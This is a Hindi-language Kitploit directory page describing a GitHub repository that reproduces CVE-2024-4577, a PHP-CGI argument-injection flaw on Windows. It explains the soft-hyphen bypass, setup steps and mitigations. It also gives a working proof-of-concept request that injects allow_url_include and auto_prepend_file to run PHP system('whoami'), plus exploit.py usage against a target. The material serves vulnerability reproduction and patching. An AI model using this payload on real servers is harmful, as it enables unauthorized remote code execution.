Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2024-4577-phpcgi_rce_reproduction — CVE Reproduction: cve-2024-4577-phpcgi_rce_reproduction | Kitploit
उपकरण/GitHubGitHub/razureink/cve-2024-4577-phpcgi_rce_reproduction
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubrazureink/cve-2024-4577-phpcgi_rce_reproduction

cve-2024-4577-phpcgi_rce_reproduction

CVE Reproduction: cve-2024-4577-phpcgi_rce_reproduction

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
129 दिन पहलेअभी तक समीक्षित नहीं

CVE-2024-4577 - विंडोज पर PHP CGI आर्गुमेंट इंजेक्शन ("WorstFit")

अवलोकन

CVE-2024-4577 विंडोज पर PHP के CGI कार्यान्वयन में एक गंभीर रिमोट कोड निष्पादन भेद्यता है। यह मूल CVE-2012-1823 के फिक्स को बायपास करता है, विंडोज "Best-Fit" कोड पेज रूपांतरण का उपयोग करके CGI क्वेरी स्ट्रिंग के माध्यम से कमांड-लाइन आर्गुमेंट्स को तस्करी करता है।

  • CVSS स्कोर: 9.8 (गंभीर)
  • खोजकर्ता: ऑरेंज साई (DEVCORE)
  • प्रकार: OS कमांड इंजेक्शन / आर्गुमेंट इंजेक्शन
  • पैच दिनांक: 6 जून, 2024

तकनीकी विवरण

जब PHP एक CGI मॉड्यूल (php-cgi.exe) के रूप में चलता है, तो यह क्वेरी स्ट्रिंग को कमांड-लाइन आर्गुमेंट के रूप में पार्स करता है। CVE-2012-1823 के मूल फिक्स ने आर्गुमेंट इंजेक्शन को रोकने के लिए - (हाइफन, 0x2D) कैरेक्टर को ब्लॉक कर दिया था। हालांकि, कुछ कोड पेजों (जैसे चीनी, जापानी, कोरियाई) का उपयोग करने वाले विंडोज सिस्टम पर, "Best-Fit" कैरेक्टर मैपिंग सुविधा विशिष्ट यूनिकोड कैरेक्टर को उनके निकटतम ASCII समकक्षों में परिवर्तित करती है।

मुख्य बायपास सॉफ्ट-हाइफन कैरेक्टर (0xAD / U+00AD) का उपयोग करता है। जब कोई अनुरोध क्वेरी स्ट्रिंग में %AD पास करता है और सर्वर का लोकेल "Best-Fit" कोड पेज का उपयोग करता है, तो विंडोज आंतरिक रूप से 0xAD को 0x2D (हाइफन) में परिवर्तित करता है, जिससे हमलावर फिल्टर के बावजूद PHP आर्गुमेंट इंजेक्ट कर सकता है।

उदाहरण: %ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input बन जाता है -d allow_url_include=1 -d auto_prepend_file=php://input

प्रभावित संस्करण

  • PHP 8.1.* 8.1.29 से पहले
  • PHP 8.2.* 8.2.20 से पहले
  • PHP 8.3.* 8.3.8 से पहले

कॉन्फ़िगरेशन आवश्यकताएँ:

  • PHP php-cgi.exe के साथ CGI के रूप में चल रहा हो
  • Apache वेब सर्वर mod_cgi या mod_cgid के साथ कॉन्फ़िगर हो
  • विंडोज लोकेल "Best-Fit" कोड पेज (चीनी, जापानी, कोरियाई, आदि) का उपयोग करता हो

एनवायरनमेंट सेटअप (XAMPP)

  1. विंडोज के लिए एक कमजोर PHP संस्करण (जैसे 8.1.28) डाउनलोड करें।
  2. XAMPP या Apache को CGI मोड में सेटअप करें:
    root@kitploit:~
    ScriptAlias /php-cgi/ "C:/php/"
    Action application/x-httpd-php-cgi /php-cgi/php-cgi.exe
    
  3. लक्ष्य सत्यापित करें: http://localhost/php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input

उपयोग

root@kitploit:~
python exploit.py -t http://target/php-cgi/php-cgi.exe -c "whoami"
python exploit.py -t http://target/php-cgi/php-cgi.exe --phpinfo

PoC

तैयार किया गया पेलोड क्वेरी स्ट्रिंग के माध्यम से PHP कॉन्फ़िगरेशन निर्देशों को इंजेक्ट करता है:

root@kitploit:~
GET /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input
Host: target
Content-Type: application/x-www-form-urlencoded

<?php system("whoami"); ?>

शमन

  • PHP को 8.3.8+, 8.2.20+, या 8.1.29+ पर अपग्रेड करें
  • CGI मोड को अक्षम करें और इसके बजाय PHP-FPM, mod_php, या FastCGI का उपयोग करें
  • php-cgi.exe के अनुरोधों को ब्लॉक करने के लिए IIS या Apache रीराइट नियम लागू करें
  • PHP को केवल गैर-Best-Fit कोड पेजों (जैसे अंग्रेजी) वाले सिस्टम पर चलाएँ

संदर्भ

  • https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-en/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-4577
  • https://www.php.net/ChangeLog-8.php
  • https://github.com/php/php-src/commit/2ae601d8d0d5b42891c6e15a28a14d1f44855f09
टूल डाउनलोड करें